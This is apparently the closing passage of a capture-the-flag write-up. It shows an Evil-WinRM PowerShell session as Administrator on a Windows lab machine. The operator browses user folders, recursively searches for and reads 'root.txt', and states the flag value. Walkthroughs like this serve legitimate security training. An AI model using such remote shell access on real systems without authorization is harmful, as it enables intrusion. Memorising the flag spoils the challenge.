Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/23/2021 11:27 AM 3D Objects
d-r--- 10/23/2021 11:27 AM Contacts
d-r--- 3/3/2022 7:48 PM Desktop
d-r--- 10/23/2021 12:22 PM Documents
d-r--- 10/25/2021 2:06 PM Downloads
d-r--- 10/23/2021 11:27 AM Favorites
d-r--- 10/23/2021 11:28 AM Links
d-r--- 10/23/2021 11:27 AM Music
d-r--- 10/23/2021 11:27 AM Pictures
d-r--- 10/23/2021 11:27 AM Saved Games
d-r--- 10/23/2021 11:27 AM Searches
d-r--- 10/23/2021 11:27 AM Videos
*Evil-WinRM* PS C:\Users\Administrator> ls -Recurse | ? { $_.Name -eq 'root.txt' }
*Evil-WinRM* PS C:\Users\Administrator>
Recursively search for the file from C:\: ls -Recurse | ? { $_.Name -eq 'root.txt' }
*Evil-WinRM* PS C:\Users\Administrator>
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../
*Evil-WinRM* PS C:\Users\Administrator> cd ../
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> cd ../
*Evil-WinRM* PS C:\> ls -Recurse | ? { $_.Name -eq 'root.txt' }
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/15/2023 6:06 AM 34 root.txt
^C
Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\> cd C:\Users\TRX\Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
51133447a29f21056ee6ded62a00f9d5
*Evil-WinRM* PS C:\Users\TRX\Desktop>
We get the flag – 51133447a29f21056ee6ded62a00f9d5